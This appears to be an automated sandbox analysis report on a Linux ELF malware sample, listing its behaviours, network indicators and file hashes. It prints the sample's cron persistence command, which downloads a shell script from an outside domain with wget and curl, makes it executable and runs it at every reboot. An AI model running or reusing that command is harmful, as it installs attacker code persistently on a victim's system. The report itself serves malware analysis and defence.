Analysis Overview
SHA256
721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443
Threat Level: Shows suspicious behavior
The file 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:31
Reported
2024-10-27 02:33
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
149s
Max time network
139s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 152.53.15.127 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.1cgCnI | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/busybox ntpd | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A |
Reads runtime system information
Processes
/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
[/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 152.53.15.127:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:13831 | kingstonwikkerink.dyn | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
Files
/var/spool/cron/crontabs/tmp.1cgCnI
| MD5 | 050970160d674c8e3e883f557c869f9c |
| SHA1 | 9f62fac10caa5e0f6f9642947ef6e7b8e3418dbc |
| SHA256 | f93a301e05ee4495bf0a2c767c9a61a4f084c19bc08f618c5a0118533391f203 |
| SHA512 | 584e048471b1d5f554923779f088f10a26d72e6d04200b5cd4049191837de7484b46c578448223888ea5bf054412966bc216818d6fbc03800f39432683f67a10 |